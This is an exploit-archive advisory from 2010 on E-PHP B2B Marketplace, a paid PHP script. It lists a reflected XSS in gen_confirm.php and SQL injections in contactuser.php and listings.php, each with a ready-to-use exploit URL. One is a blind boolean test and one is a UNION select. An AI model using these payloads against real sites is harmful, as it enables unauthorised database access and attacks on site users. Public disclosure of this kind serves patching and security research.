[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : E-PHP B2B Marketplace Multiple Vulns
# Published : 2010-06-11
# Author : MizoZ
# Previous Title : Yamamah 1.0 SQL Injection Vulnerability
# Next Title : Site for Real Estate - Brokers SQL Injection Vulnerability
/*
Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com
*/
# XSS
- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS
- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=
# Blind SQLi
- contactuser.php suffers from a blind sqli in the get "es_id"
- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--
# SQLi
- listings.php suffers from a blind sqli in the get "mem_id"
- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--